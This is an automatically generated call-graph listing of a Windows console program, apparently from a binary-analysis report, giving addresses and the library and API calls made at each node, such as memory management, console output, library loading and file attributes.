27670->28013 27671 955264 27674 943314 3 API calls 27671->27674 27673 95513a 27673->27671 27681 943208 2 API calls 27673->27681 27677 955276 27674->27677 27675 954fd0 27678 954fe4 27675->27678 27679 955032 27675->27679 27694 9552be 27677->27694 28016 951b60 7 API calls 27677->28016 27682 942130 2 API calls 27678->27682 27696 955013 27679->27696 28014 944938 wcscmp 27679->28014 27680 955129 free free 27680->27673 27684 955153 27681->27684 27683 954fee 27682->27683 27687 955003 27683->27687 27692 943208 2 API calls 27683->27692 28015 952b54 42 API calls 27684->28015 27698 94b8f0 4 API calls 27687->27698 27689 955043 27689->27696 27700 942130 2 API calls 27689->27700 27690 9552a5 27695 943404 4 API calls 27690->27695 27691 94362c 6 API calls 27697 9550d8 free 27691->27697 27692->27687 27693 955164 27699 95525a free 27693->27699 27703 942130 2 API calls 27693->27703 27702 9553ec 27694->27702 27709 943208 2 API calls 27694->27709 27701 9552b3 free 27695->27701 27696->27691 27697->27667 27698->27696 27699->27671 27705 955052 27700->27705 27701->27694 27704 955400 27702->27704 27719 955461 27702->27719 27706 95517b 27703->27706 27707 943404 4 API calls 27704->27707 27708 955067 27705->27708 27713 943208 2 API calls 27705->27713 27711 955194 27706->27711 27715 943208 2 API calls 27706->27715 27712 955411 27707->27712 27718 94b8f0 4 API calls 27708->27718 27724 9552e8 free 27709->27724 27710 955c23 27714 943404 4 API calls 27710->27714 27722 94b8f0 4 API calls 27711->27722 27716 955427 27712->27716 28018 94695c 39 API calls 27712->28018 27713->27708 27717 955c34 27714->27717 27715->27711 27716->27710 27721 955433 free free 27716->27721 27729 943208 2 API calls 27717->27729 27736 95606d 27717->27736 27845 956557 free free 27717->27845 27718->27696 27719->27710 27723 943208 2 API calls 27719->27723 27721->27642 27752 9551a8 27722->27752 27726 955488 27723->27726 27724->27702 27727 95536b 27724->27727 27730 947ebc 90 API calls 27726->27730 27731 943404 4 API calls 27727->27731 27732 955c5b 27729->27732 27733 95549b 27730->27733 27735 955387 27731->27735 27737 955c93 27732->27737 28036 951afc malloc _CxxThrowException memmove 27732->28036 27734 9554a4 27733->27734 27750 955b62 27733->27750 27738 9554f3 27734->27738 27739 9554ae 27734->27739 27747 943314 3 API calls 27735->27747 27805 956197 27736->27805 27736->27845 28048 951924 VariantClear _CxxThrowException _CxxThrowException 27736->28048 27743 94362c 6 API calls 27737->27743 28019 9518f8 malloc _CxxThrowException memmove 27738->28019 27745 9554b7 free free free 27739->27745 27746 95576f 27739->27746 27741 942130 2 API calls 27774 95625a 27741->27774 27744 955ca7 27743->27744 28037 952c58 19 API calls 27744->28037 27745->27642 27756 955836 27746->27756 27757 95577e 27746->27757 27755 9553c7 27747->27755 27748 9560c2 27758 9560c9 free free 27748->27758 27795 9560f8 27748->27795 27749 955c77 27759 943404 4 API calls 27749->27759 27751 955c16 free 27750->27751 27768 943314 3 API calls 27750->27768 27751->27710 27754 943404 4 API calls 27752->27754 27761 955251 27754->27761 28017 966154 malloc _CxxThrowException free 27755->28017 27765 9559e4 27756->27765 27766 95583f 27756->27766 28020 94c54c 94 API calls 27757->28020 27758->27642 27767 955c88 free 27759->27767 27760 955cb4 27769 955cb9 27760->27769 27770 955d18 27760->27770 27761->27699 27775 9559f6 27765->27775 27776 955a9b 27765->27776 27777 943314 3 API calls 27766->27777 27767->27737 27811 955b9a 27768->27811 28038 952094 7 API calls 27769->28038 27779 943208 2 API calls 27770->27779 27771 955510 27780 94318c 4 API calls 27771->27780 27772 9553d2 27781 94362c 6 API calls 27772->27781 27773 955788 27783 955826 27773->27783 27784 955791 27773->27784 27993 949220 27774->27993 28026 94695c 39 API calls 27775->28026 28028 948624 27776->28028 27787 95584e 27777->27787 27790 955d22 27779->27790 27791 955526 free 27780->27791 27792 9553e1 free 27781->27792 27783->27751 28021 952094 7 API calls 27784->28021 28022 94c54c 94 API calls 27787->28022 27789 955cd0 27800 956060 free 27789->27800 27801 955cdb free free free 27789->27801 27802 955d48 27790->27802 27812 955d32 27790->27812 27813 95559e 27791->27813 27792->27702 27793 955aa5 27793->27751 27803 955aae 27793->27803 27795->27805 27819 95619c 27795->27819 27820 95618a 27795->27820 27797 955a00 27797->27751 27798 955a09 27797->27798 28027 95211c 13 API calls 27798->28027 27799 955859 27809 955862 27799->27809 27810 95590d 27799->27810 27800->27736 27801->27642 28039 94a8a0 24 API calls 27802->28039 28034 946d48 47 API calls 27803->28034 27804 9557a5 27816 9557e7 free free free 27804->27816 27817 9557ab free free free 27804->27817 27805->27741 27805->27845 27806 9562d2 28051 95211c 13 API calls 27806->28051 28023 952094 7 API calls 27809->28023 28024 946a04 41 API calls 27810->28024 27825 943208 2 API calls 27811->27825 27827 943404 4 API calls 27812->27827 27828 9555a5 free free free free 27813->27828 27829 9555ed 27813->27829 27816->27642 27817->27642 27818 956484 27832 9564ee 27818->27832 27858 943314 3 API calls 27818->27858 28049 946b2c 41 API calls 27819->28049 27833 943404 4 API calls 27820->27833 27821 9562e6 27834 9562ec free free 27821->27834 27835 95632a free free 27821->27835 27823 955a1d 27837 955a23 free free free 27823->27837 27838 955a5f free free free 27823->27838 27840 955bcb 27825->27840 27842 955d43 27827->27842 27828->27642 27844 955765 free 27829->27844 27856 9556b4 27829->27856 27869 955714 free free free free 27829->27869 27870 95560c 27829->27870 27830 955ab8 27830->27751 27843 955ac1 GetLastError 27830->27843 27831 955d61 27831->27842 28040 952094 7 API calls 27831->28040 27832->27845 27872 956518 free free 27832->27872 27833->27805 27834->27642 27835->27642 27836 9561aa 27847 9561af 27836->27847 27848 956228 27836->27848 27837->27642 27838->27642 27839 955876 27849 9558c3 free free free free 27839->27849 27850 95587c free free free free 27839->27850 27851 947ebc 90 API calls 27840->27851 27841 95591c 27853 9559d5 free 27841->27853 27854 955925 27841->27854 27860 956055 free 27842->27860 27864 955e66 27842->27864 27865 955de2 27842->27865 27843->27751 27855 955ad0 27843->27855 27844->27746 27845->27642 28050 952204 7 API calls 27847->28050 27848->27805 27849->27642 27850->27642 27867 955bde 27851->27867 27853->27751 28025 952204 7 API calls 27854->28025 28035 95211c 13 API calls 27855->28035 27856->27844 27871 9564a6 27858->27871 27859 956368 27859->27818 27863 948c98 3 API calls 27859->27863 27860->27800 27862 955d7d 27862->27842 27874 955d84 free free free free 27862->27874 27875 9563b0 27863->27875 27864->27860 28043 9494a4 malloc _CxxThrowException free memset 27864->28043 28041 946b2c 41 API calls 27865->28041 27878 955bfd free free 27867->27878 27982 9468a0 27867->27982 27869->27642 27880 955614 27870->27880 27881 9556c3 free free free free 27870->27881 28054 953210 6 API calls 27871->28054 27872->27642 27873 955ae4 27884 955b26 free free free 27873->27884 27885 955aea free free free 27873->27885 27874->27642 27886 956415 27875->27886 28052 95211c 13 API calls 27875->28052 27877 9561c6 27888 9561cc free free 27877->27888 27889 9561fa free free 27877->27889 27878->27751 27879 95593e 27891 955944 free free free free 27879->27891 27892 95598b free free free free 27879->27892 27880->27856 27893 95561c 27880->27893 27881->27642 27898 95597b 27884->27898 27885->27898 27996 948adc 27886->27996 27887 955df1 27887->27860 28042 952204 7 API calls 27887->28042 27888->27898 27889->27898 27891->27898 27892->27898 27900 955620 free free free free 27893->27900 27901 95566a free free free free 27893->27901 27894 9564bf 27902 9564e4 free 27894->27902 27908 943404 4 API calls 27894->27908 27897 955e92 27906 95604a free 27897->27906 27911 943208 2 API calls 27897->27911 27898->27642 27900->27642 27901->27642 27902->27832 27903 9563cf 27903->27886 27909 9563d6 free free 27903->27909 27906->27860 27912 9564e3 27908->27912 27909->27642 27910 955e13 27910->27860 27914 955e1e free free free free 27910->27914 27916 955eb6 27911->27916 27912->27902 27914->27898 27918 943208 2 API calls 27916->27918 27917 95643e 27917->27818 27919 956445 free free 27917->27919 27920 955ec4 27918->27920 27919->27642 28044 9492d4 malloc _CxxThrowException _CxxThrowException free 27920->28044 27923 955eeb 27924 955ef4 27923->27924 27925 955f83 27923->27925 28045 952094 7 API calls 27924->28045 28046 949828 130 API calls 27925->28046 27928 955f0a 27930 955f15 7 API calls 27928->27930 27931 95602f free free 27928->27931 27929 955f9d 27929->27931 28047 95211c 13 API calls 27929->28047 27930->27642 27931->27906 27933 955fba 27933->27931 27934 955fc1 7 API calls 27933->27934 27934->27642 27936 96ed02 27935->27936 27937 96ecd3 27935->27937 27938 96b204 VariantClear 27936->27938 27937->27936 27939 96eceb free free 27937->27939 27940 96ed27 27938->27940 27939->27937 27941 954540 27940->27941 28055 96dfa4 14 API calls 27940->28055 27941->27561 27941->27562 27941->27642 27943 96ed47 27943->27941 27944 943404 4 API calls 27943->27944 27945 96ed5b 27944->27945 27946 96b204 VariantClear 27945->27946 27957 96ed7b 27945->27957 27946->27957 27947 96eff6 28059 944d78 10 API calls 27947->28059 27948 96ef2c 28058 96e954 19 API calls 27948->28058 27949 96eebc 27952 94339c 4 API calls 27949->27952 27953 96eefa 27949->27953 27952->27953 27953->27947 27953->27948 27954 96ee0f 27956 94ae2c VariantClear 27954->27956 27955 96ee32 27955->27954 27960 96ee55 27955->27960 28057 96dfa4 14 API calls 27955->28057 27956->27941 27957->27941 27957->27949 27957->27954 27957->27955 28056 9434c0 malloc _CxxThrowException SysStringLen free 27957->28056 27958 96ef3e 27958->27941 27961 94339c 4 API calls 27958->27961 27963 96ef8f 27958->27963 27964 94ae2c VariantClear 27960->27964 27961->27963 27963->27941 27965 96efe0 free free 27963->27965 27964->27949 27965->27941 27966 96ee7a 27966->27954 27967 96b204 VariantClear 27966->27967 27968 96ee9b 27967->27968 27968->27954 27968->27960 27971 96b234 27969->27971 27970 94ae2c VariantClear 27972 9549de 27970->27972 27971->27970 27972->27598 27972->27642 27975 952023 27973->27975 27974 94ae2c VariantClear 27976 95206a 27974->27976 27975->27974 27976->27642 27976->27659 27978 943208 2 API calls 27977->27978 27981 9663f5 27978->27981 27979 9550fa 27979->27671 27979->27673 27979->27680 27980 94362c 6 API calls 27980->27981 27981->27979 27981->27980 27983 9468bb 27982->27983 27984 9468d5 27983->27984 27985 9468c2 SetFileAttributesW 27983->27985 27986 9468d1 27984->27986 27987 943208 2 API calls 27984->27987 27985->27984 27985->27986 27986->27878 27988 9468e3 27987->27988 27989 94a7ec 35 API calls 27988->27989 27990 9468f8 27989->27990 27991 94691c free 27990->27991 27992 9468fc SetFileAttributesW free 27990->27992 27991->27986 27992->27986 27994 948cdc 39 API calls 27993->27994 27995 949242 27994->27995 27995->27806 27995->27859 27997 948a60 2 API calls 27996->27997 27998 948aef 27997->27998 27998->27818 28053 95211c 13 API calls 27998->28053 28001->27621 28002->27635 28003->27606 28004->27606 28005->27611 28006->27611 28007->27605 28008->27609 28009->27618 28010->27651 28011->27618 28012->27666 28013->27675 28014->27689 28015->27693 28016->27690 28017->27772 28018->27716 28019->27771 28020->27773 28021->27804 28022->27799 28023->27839 28024->27841 28025->27879 28026->27797 28027->27823 28029 943208 2 API calls 28028->28029 28030 948683 28029->28030 28031 947ebc 90 API calls 28030->28031 28032 948691 free 28031->28032 28032->27793 28034->27830 28035->27873 28036->27749 28037->27760 28038->27789 28039->27831 28040->27862 28041->27887 28042->27910 28043->27897 28044->27923 28045->27928 28046->27929 28047->27933 28048->27748 28049->27836 28050->27877 28051->27821 28052->27903 28053->27917 28054->27894 28055->27943 28057->27966 28058->27958 28059->27941 28060 988817 28061 98882c 28060->28061 28062 98881c fputs 28060->28062 28206 950dcc 28061->28206 28062->28061 28064 988841 28065 988878 GetStdHandle GetConsoleScreenBufferInfo 28064->28065 28066 988899 28064->28066 28065->28066 28067 942130 2 API calls 28066->28067 28068 9888ac 28067->28068 28316 987c40 28068->28316 28072 9889a2 28073 9889a7 _CxxThrowException 28072->28073 28079 9889c3 28072->28079 28073->28079 28074 988a78 28360 974c2c 28074->28360 28077 988a54 _CxxThrowException 28077->28074 28078 988aad _CxxThrowException 28098 988ad1 28078->28098 28079->28074 28079->28077 28381 9432bc 28079->28381 28081 988bb3 28089 988c21 28081->28089 28387 94bf04 22 API calls 28081->28387 28084 94362c 6 API calls 28086 988a2a 28084->28086 28087 943314 3 API calls 28086->28087 28091 988a3f _CxxThrowException 28087->28091 28088 988bb8 _CxxThrowException 28088->28081 28373 942300 fputc 28089->28373 28090 988c00 28090->28089 28092 988c05 _CxxThrowException 28090->28092 28091->28077 28092->28089 28094 988c58 fputs 28374 942300 fputc 28094->28374 28097 988b98 free 28097->28081 28097->28098 28098->28081 28098->28088 28098->28097 28385 969644 11 API calls 28098->28385 28386 94e9c8 malloc _CxxThrowException memmove free memmove 28098->28386 28099 988cbc 28375 942300 fputc 28099->28375 28101 988cc4 fputs 28376 942300 fputc 28101->28376 28105 988cdc strlen 28107 988d08 28105->28107 28108 98902b 28105->28108 28390 98640c fputc fputs fputs fputc 28107->28390 28377 942300 fputc 28108->28377 28109 988c70 28109->28099 28388 98640c fputc fputs fputs fputc 28109->28388 28389 942300 fputc 28109->28389 28112 98903b fputs 28378 942300 fputc 28112->28378 28119 98906d fputs fputc 28122 989053 28119->28122 28123 989096 fputc 28119->28123 28122->28119 28172 98914d 28122->28172 28391 942670 fputs 28122->28391 28128 9890ae fputc fputc fputc 28123->28128 28127 9892ab 28379 942300 fputc 28127->28379 28131 989100 28128->28131 28392 9863b8 fputc fputs 28131->28392 28132 9892b3 fputs 28380 942300 fputc 28132->28380 28142 9892e2 fputs fputc 28147 9892cb 28142->28147 28147->28142 28152 989395 28147->28152 28400 9863b8 fputc fputs 28147->28400 28205 989489 28152->28205 28401 98640c fputc fputs fputs fputc 28152->28401 28402 968d38 VariantClear 28152->28402 28403 9863b8 fputc fputs 28152->28403 28154 9891a2 fputc 28154->28172 28158 98a5c5 28161 98a5ca _CxxThrowException 28158->28161 28162 98a5e7 free 28158->28162 28160 98a5c0 28404 9866a8 30 API calls 28160->28404 28161->28162 28166 98a605 28162->28166 28167 98a626 free 28162->28167 28165 9891c4 fputc 28165->28172 28173 98a609 free 28166->28173 28174 98a63c 28167->28174 28172->28127 28172->28154 28172->28165 28176 9891e4 fputc fputc 28172->28176 28393 98640c fputc fputs fputs fputc 28172->28393 28394 9689f0 VariantClear 28172->28394 28395 942670 fputs 28172->28395 28173->28167 28173->28173 28405 987080 6 API calls 28174->28405 28396 968a78 VariantClear 28176->28396 28182 98a64a 28406 94182c free free free free free 28182->28406 28189 989218 28397 9863b8 fputc fputs 28189->28397 28398 968b00 malloc _CxxThrowException free VariantClear 28189->28398 28195 98926c fputc fputs 28399 942300 fputc 28195->28399 28199 98928f free 28199->28127 28199->28172 28205->28158 28205->28160 28207 950df5 28206->28207 28208 950e1b 28206->28208 28470 9602a0 6 API calls 28207->28470 28210 943314 3 API calls 28208->28210 28213 950e2c 28210->28213 28211 950e09 _CxxThrowException 28211->28208 28212 950e4e free 28471 9602a0 6 API calls 28212->28471 28213->28212 28215 950e98 free 28213->28215 28218 950ede 28215->28218 28219 950ece 28215->28219 28216 950e6e _CxxThrowException 28216->28213 28221 950f29 wcscmp 28218->28221 28223 950f3e 28218->28223 28220 944b58 7 API calls 28219->28220 28220->28218 28222 950f7b 28221->28222 28221->28223 28472 9602a0 6 API calls 28222->28472 28407 94fadc 28223->28407 28225 950f8f _CxxThrowException 28225->28223 28228 94fadc 10 API calls 28229 950fee 28228->28229 28230 95102d 28229->28230 28473 950358 189 API calls 28229->28473 28236 95105c 28230->28236 28474 950358 189 API calls 28230->28474 28233 951177 28417 950160 28233->28417 28235 951130 28239 943404 4 API calls 28235->28239 28236->28233 28236->28235 28475 9602a0 6 API calls 28236->28475 28240 951141 28239->28240 28240->28233 28476 9602a0 6 API calls 28240->28476 28241 9511f1 28244 95121e 28241->28244 28246 943404 4 API calls 28241->28246 28242 95111e _CxxThrowException 28242->28235 28243 943404 4 API calls 28243->28241 28434 944b58 28244->28434 28246->28244 28248 951165 _CxxThrowException 28248->28233 28252 951871 28255 951876 28252->28255 28256 9518cf 28252->28256 28253 95159a 28254 9515e9 28253->28254 28259 951807 28253->28259 28482 9602a0 6 API calls 28253->28482 28483 950998 72 API calls 28254->28483 28263 9463d0 57 API calls 28255->28263 28260 9518d8 _CxxThrowException 28256->28260 28315 9514fb 28256->28315 28257 9512d9 28456 9463d0 28257->28456 28259->28252 28259->28315 28501 9602a0 6 API calls 28259->28501 28267 951882 28263->28267 28265 9515d7 _CxxThrowException 28265->28254 28266 9515f8 28484 94ef70 28266->28484 28269 946360 15 API calls 28267->28269 28271 95188b 28269->28271 28274 944b58 7 API calls 28271->28274 28274->28315 28275 95185f _CxxThrowException 28275->28252 28276 9513b2 28281 9513ed 28276->28281 28478 950358 189 API calls 28276->28478 28279 9516c8 28285 9517a8 28279->28285 28289 951736 28279->28289 28497 9602a0 6 API calls 28279->28497 28280 9513a0 _CxxThrowException 28280->28276 28284 95141f 28281->28284 28479 950358 189 API calls 28281->28479 28282 943404 4 API calls 28286 95169d 28282->28286 28290 95143e 28284->28290 28480 945164 6 API calls 28284->28480 28288 9517ca 28285->28288 28293 943404 4 API calls 28285->28293 28286->28279 28496 943890 memmove 28286->28496 28288->28315 28500 9602a0 6 API calls 28288->28500 28289->28285 28296 951767 28289->28296 28498 9602a0 6 API calls 28289->28498 28292 9463d0 57 API calls 28290->28292 28297 95144c 28292->28297 28293->28288 28295 951724 _CxxThrowException 28295->28289 28296->28285 28499 9602a0 6 API calls 28296->28499 28466 96408c 28297->28466 28302 9517f5 _CxxThrowException 28302->28259 28303 951755 _CxxThrowException 28303->28296 28306 946360 15 API calls 28308 951464 28306->28308 28307 951796 _CxxThrowException 28307->28285 28309 943404 4 API calls 28308->28309 28311 951483 28308->28311 28309->28311 28310 9514d9 28313 943404 4 API calls 28310->28313 28310->28315 28311->28310 28311->28315 28481 9602a0 6 API calls 28311->28481 28313->28315 28314 9514c7 _CxxThrowException 28314->28310 28315->28064 28317 943208 2 API calls 28316->28317 28318 987c84 28317->28318 28319 96ab74 28318->28319 28320 96aba6 28319->28320 28336 96abd3 28319->28336 28320->28336 28653 9694a8 7 API calls 28320->28653 28321 96ae31 28550 9683c8 28321->28550 28330 96ae7f 28333 96ae99 28330->28333 28334 94339c 4 API calls 28330->28334 28331 943208 malloc _CxxThrowException 28331->28336 28332 96af7a free 28332->28072 28335 9431c0 4 API calls 28333->28335 28334->28333 28337 96aeaf 28335->28337 28336->28321 28336->28331 28339 943518 malloc _CxxThrowException free 28336->28339 28350 94b8f0 malloc _CxxThrowException memmove free 28336->28350 28353 96ad95 free 28336->28353 28354 96adc2 memmove 28336->28354 28356 942130 malloc _CxxThrowException 28336->28356 28654 969d98 28336->28654 28673 96a034 8 API calls 28336->28673 28674 969af0 28336->28674 28681 9694a8 7 API calls 28336->28681 28634 96a9fc 28337->28634 28339->28336 28343 96aed1 28345 9431c0 4 API calls 28343->28345 28344 96ae7a 28344->28332 28347 96aee7 28345->28347 28348 96a9fc 126 API calls 28347->28348 28349 96aef3 free 28348->28349 28349->28344 28352 96af06 28349->28352 28350->28336 28352->28344 28358 96af38 28352->28358 28353->28336 28354->28336 28355 96af3b GetProcAddress 28355->28358 28356->28336 28358->28355 28359 96af71 28358->28359 28359->28332 28359->28344 28361 974c5c 28360->28361 28369 974c79 28360->28369 28362 974c60 free 28361->28362 28362->28362 28362->28369 28363 974d9c 28363->28078 28363->28098 28365 974d9e free 28365->28363 28367 974dac free 28367->28363 28368 942130 2 API calls 28368->28369 28369->28363 28369->28365 28369->28367 28369->28368 28370 974d63 memmove 28369->28370 28371 94b8f0 4 API calls 28369->28371 28805 949a80 malloc _CxxThrowException memmove 28369->28805 28806 96bb68 16 API calls 28369->28806 28370->28369 28372 974d86 free 28371->28372 28372->28363 28372->28369 28373->28094 28374->28109 28375->28101 28376->28105 28377->28112 28378->28122 28379->28132 28380->28147 28382 9432d0 28381->28382 28383 942fbc 2 API calls 28382->28383 28384 9432e4 28383->28384 28384->28084 28385->28098 28386->28098 28387->28090 28389->28109 28391->28128 28394->28172 28395->28172 28396->28189 28398->28195 28399->28199 28402->28152 28404->28158 28405->28182 28408 94fb00 28407->28408 28409 94fb08 28407->28409 28408->28228 28410 943314 3 API calls 28409->28410 28411 94fb21 28410->28411 28412 94fb3f free 28411->28412 28415 94fb4f 28411->28415 28412->28408 28414 94fba2 _CxxThrowException 28416 94fbb4 free 28414->28416 28415->28416 28502 9602a0 6 API calls 28415->28502 28416->28408 28418 95018f 28417->28418 28419 9432bc 2 API calls 28418->28419 28426 9501e4 28418->28426 28420 9501b0 28419->28420 28503 94ed8c 6 API calls 28420->28503 28421 950325 28421->28241 28421->28243 28423 9501d1 free 28423->28426 28424 9502ca 28507 9602a0 6 API calls 28424->28507 28426->28421 28426->28424 28429 9502c8 28426->28429 28504 94fec8 142 API calls 28426->28504 28505 94fd30 12 API calls 28426->28505 28506 94ed8c 6 API calls 28426->28506 28427 9502de _CxxThrowException 28427->28429 28429->28421 28508 9602a0 6 API calls 28429->28508 28433 950313 _CxxThrowException 28433->28421 28435 944b77 28434->28435 28436 944b7f 28434->28436 28446 950c20 28435->28446 28437 944bb6 28436->28437 28438 944ba1 free free 28436->28438 28439 942130 2 API calls 28437->28439 28445 944bfd 28437->28445 28438->28436 28440 944bd3 28439->28440 28442 944bdc memmove 28440->28442 28443 944bef free 28440->28443 28441 942130 2 API calls 28441->28445 28442->28443 28443->28445 28444 943314 3 API calls 28444->28445 28445->28435 28445->28441 28445->28444 28447 950d37 28446->28447 28453 950c4a 28446->28453 28447->28253 28447->28257 28448 943208 malloc _CxxThrowException 28448->28453 28449 943404 4 API calls 28449->28453 28450 94339c 4 API calls 28450->28453 28451 942130 2 API calls 28451->28453 28452 943314 malloc _CxxThrowException memmove 28452->28453 28453->28447 28453->28448 28453->28449 28453->28450 28453->28451 28453->28452 28454 94b8f0 4 API calls 28453->28454 28455 950d0d free free 28454->28455 28455->28447 28455->28453 28459 946419 28456->28459 28460 9463e5 28456->28460 28457 946451 28462 946360 28457->28462 28459->28457 28461 94643c free free 28459->28461 28460->28459 28509 945d18 55 API calls 28460->28509 28461->28459 28464 946379 28462->28464 28463 9463c4 28463->28276 28477 9602a0 6 API calls 28463->28477 28464->28463 28510 945bbc 15 API calls 28464->28510 28467 96409e 28466->28467 28468 951458 28466->28468 28467->28468 28511 963e14 28467->28511 28468->28306 28470->28211 28471->28216 28472->28225 28473->28230 28474->28236 28475->28242 28476->28248 28477->28280 28478->28281 28479->28284 28480->28290 28481->28314 28482->28265 28483->28266 28486 94ef91 28484->28486 28487 94ef99 28484->28487 28485 94efd9 28489 942130 2 API calls 28485->28489 28494 94f020 28485->28494 28486->28279 28486->28282 28487->28485 28488 94efbb free free free 28487->28488 28488->28487 28490 94eff6 28489->28490 28491 94f012 free 28490->28491 28492 94efff memmove 28490->28492 28491->28494 28492->28491 28493 942130 2 API calls 28493->28494 28494->28486 28494->28493 28495 943314 malloc _CxxThrowException memmove 28494->28495 28495->28494 28496->28279 28497->28295 28498->28303 28499->28307 28500->28302 28501->28275 28502->28414 28503->28423 28504->28426 28505->28426 28506->28426 28507->28427 28508->28433 28509->28460 28510->28464 28529 961370 28511->28529 28514 961370 96 API calls 28515 963e45 28514->28515 28516 963ea2 28515->28516 28533 9601a8 28515->28533 28517 963fdd 28516->28517 28525 94520c malloc _CxxThrowException memmove memmove free 28516->28525 28526 963f6b memmove 28516->28526 28547 942748 CharUpperW CharUpperW 28516->28547 28548 945424 6 API calls 28516->28548 28518 964043 28517->28518 28520 94318c 4 API calls 28517->28520 28523 963e14 105 API calls 28517->28523 28549 95ff04 malloc _CxxThrowException memmove 28517->28549 28518->28467 28520->28517 28524 964022 free free 28523->28524 28524->28517 28524->28518 28525->28516 28526->28516 28530 9613dd 28529->28530 28532 961388 28529->28532 28530->28514 28531 9601a8 96 API calls 28531->28532 28532->28530 28532->28531 28534 960259 28533->28534 28535 9601c8 28533->28535 28534->28515 28535->28534 28536 943208 2 API calls 28535->28536 28537 9601ec 28536->28537 28538 94318c 4 API calls 28537->28538 28539 9601fd 28538->28539 28540 960223 28539->28540 28541 96020c free free 28539->28541 28542 947ebc 90 API calls 28540->28542 28541->28534 28543 960232 28542->28543 28544 960244 free free 28543->28544 28545 943404 4 API calls 28543->28545 28544->28534 28546 960243 28545->28546 28546->28544 28547->28516 28549->28517 28682 946570 28550->28682 28553 9431c0 4 API calls 28554 968406 28553->28554 28555 948624 91 API calls 28554->28555 28556 96841b 28555->28556 28557 968479 28556->28557 28558 9431c0 4 API calls 28556->28558 28559 96848b free 28557->28559 28560 968499 28557->28560 28561 968435 28558->28561 28559->28560 28562 96849f free 28560->28562 28563 9684ad 28560->28563 28689 9486dc 91 API calls 28561->28689 28562->28563 28565 9684b3 free 28563->28565 28566 9684bd 28563->28566 28565->28566 28568 9685ef 28566->28568 28571 943208 2 API calls 28566->28571 28567 96844a 28567->28557 28569 9431c0 4 API calls 28567->28569 28570 943314 3 API calls 28568->28570 28573 968464 28569->28573 28574 9685fc free 28570->28574 28572 9684d0 28571->28572 28691 968290 102 API calls 28572->28691 28690 9486dc 91 API calls 28573->28690 28577 96860a 28574->28577 28601 9431c0 28577->28601 28578 9684ec 28579 9684f0 28578->28579 28580 96851b 28578->28580 28581 943314 3 API calls 28579->28581 28692 968290 102 API calls 28580->28692 28583 9684fd free free 28581->28583 28583->28577 28584 968536 28585 968565 28584->28585 28586 96853a 28584->28586 28693 968290 102 API calls 28585->28693 28587 943314 3 API calls 28586->28587 28589 968547 free free 28587->28589 28589->28577 28590 968579 28591 9685a5 28590->28591 28592 96857d 28590->28592 28694 968290 102 API calls 28591->28694 28593 943314 3 API calls 28592->28593 28595 96858a free free 28593->28595 28595->28577 28596 9685b9 28597 9685e5 free 28596->28597 28598 9685bd 28596->28598 28597->28568 28599 943314 3 API calls 28598->28599 28600 9685ca free free 28599->28600 28600->28577 28602 9431d8 28601->28602 28603 94312c 4 API calls 28602->28603 28604 9431fe 28603->28604 28605 96a7fc 28604->28605 28606 96a822 28605->28606 28607 96a872 28606->28607 28756 946490 FreeLibrary LoadLibraryExW 28606->28756 28700 96996c 28607->28700 28611 96a84d 28613 96a865 28611->28613 28614 96a851 28611->28614 28612 943404 4 API calls 28615 96a893 28612->28615 28617 946464 FreeLibrary 28613->28617 28616 946464 FreeLibrary 28614->28616 28707 9464d4 28615->28707 28620 96a85e free 28616->28620 28617->28607 28620->28330 28620->28344 28621 96a8d7 28625 96a8fd GetProcAddress 28621->28625 28626 96a8dd GetProcAddress 28621->28626 28622 96a8bf GetProcAddress 28622->28621 28624 96a8d5 28622->28624 28623 96a981 free 28627 946464 FreeLibrary 28623->28627 28624->28621 28712 9691e0 GetProcAddress GetProcAddress GetProcAddress 28625->28712 28626->28625 28631 96a8f3 28626->28631 28628 96a993 free 28627->28628 28628->28620 28630 96a945 28630->28620 28630->28623 28631->28625 28635 943208 2 API calls 28634->28635 28636 96aa29 28635->28636 28637 947df4 4 API calls 28636->28637 28638 96aa37 28637->28638 28639 943208 2 API calls 28638->28639 28640 96aa4b 28639->28640 28763 947e34 28640->28763 28642 96aac0 free 28643 96aacd free 28642->28643 28644 94794c FindClose 28643->28644 28647 96aae1 free 28644->28647 28645 94318c 4 API calls 28648 96aa5b 28645->28648 28646 947e34 40 API calls 28646->28648 28647->28343 28647->28344 28648->28642 28648->28645 28648->28646 28649 96aab1 28648->28649 28650 96a7fc 82 API calls 28648->28650 28649->28642 28651 96aa8e free 28650->28651 28651->28648 28652 96aab3 free 28651->28652 28652->28643 28770 969bcc 28654->28770 28657 969bcc 9 API calls 28669 969df2 28657->28669 28658 969ee9 28659 969f25 free 28658->28659 28662 969f0f free free 28658->28662 28660 969f33 28659->28660 28661 969f5b 28659->28661 28660->28661 28663 969f46 free free 28660->28663 28662->28658 28663->28660 28664 943208 malloc _CxxThrowException 28664->28669 28665 943404 4 API calls 28665->28669 28666 943404 4 API calls 28668 969e5a wcscmp 28666->28668 28667 942130 2 API calls 28667->28669 28668->28669 28669->28658 28669->28664 28669->28665 28669->28666 28669->28667 28670 94b8f0 4 API calls 28669->28670 28671 943314 malloc _CxxThrowException memmove 28669->28671 28672 969ec4 free free 28670->28672 28671->28669 28672->28658 28672->28669 28673->28336 28675 943314 3 API calls 28674->28675 28676 969b2b 28675->28676 28790 968f60 28676->28790 28683 943208 2 API calls 28682->28683 28684 946593 28683->28684 28695 94650c GetModuleFileNameW 28684->28695 28686 9465a3 28687 9465dd 28686->28687 28699 943518 malloc _CxxThrowException free 28686->28699 28687->28553 28689->28567 28690->28557 28691->28578 28692->28584 28693->28590 28694->28596 28696 94655e 28695->28696 28697 94654d 28695->28697 28696->28686 28697->28696 28698 94339c 4 API calls 28697->28698 28698->28696 28699->28687 28701 942130 2 API calls 28700->28701 28702 969989 28701->28702 28703 9699a6 28702->28703 28704 943208 2 API calls 28702->28704 28705 94b8f0 4 API calls 28703->28705 28704->28703 28706 9699e5 28705->28706 28706->28612 28708 946464 FreeLibrary 28707->28708 28709 9464e7 28708->28709 28710 9464f1 LoadLibraryExW 28709->28710 28711 9464ed 28709->28711 28710->28711 28711->28621 28711->28622 28711->28630 28713 969312 GetProcAddress 28712->28713 28714 969242 GetProcAddress 28712->28714 28715 969370 28713->28715 28722 969327 28713->28722 28717 969262 28714->28717 28716 969372 28715->28716 28716->28630 28723 96a180 GetProcAddress GetProcAddress 28716->28723 28717->28713 28717->28716 28718 9686e0 VariantClear SysStringByteLen 28717->28718 28719 9692e0 memmove 28717->28719 28718->28717 28757 968e6c malloc _CxxThrowException memmove free memmove 28719->28757 28722->28715 28722->28716 28758 968eec malloc _CxxThrowException memmove free 28722->28758 28724 96a214 GetProcAddress 28723->28724 28725 96a1eb GetProcAddress 28723->28725 28727 96a20f 28724->28727 28752 96a233 28724->28752 28726 96a200 28725->28726 28725->28752 